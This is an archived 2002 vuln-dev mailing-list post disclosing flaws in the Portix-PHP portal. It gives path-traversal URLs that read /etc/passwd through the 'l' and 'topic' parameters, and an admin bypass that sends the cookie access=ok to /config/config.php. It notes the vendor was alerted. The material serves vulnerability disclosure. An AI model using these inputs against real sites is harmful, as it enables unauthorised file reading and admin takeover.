I made a tutoriel in french : http://balteam.multimania.com/Tuts/Portix.txt >From: frog frog <leseulfrogat_private> >To: vuln-devat_private >Subject: Big Security Holes in Portix-PHP Portal >Date: 31 Jan 2002 16:19:47 -0000 > > > >On all version. The last one is 0.4.02 . > >To view files in the hard disk : > >www.hostportix.com/index.php?l=../../../etc/passwd > >www.hostportix.com/index.php? >l=forum/view.php&topic=../../../etc/passwd > >To be administrator : >Send the cookie name=access value=ok >to /config/config.php . > >Portix team has been alerted. > _________________________________________________________________ Rejoignez le plus grand service de messagerie au monde avec MSN Hotmail. http://www.hotmail.com/fr
This archive was generated by hypermail 2b30 : Thu Jan 31 2002 - 10:26:49 PST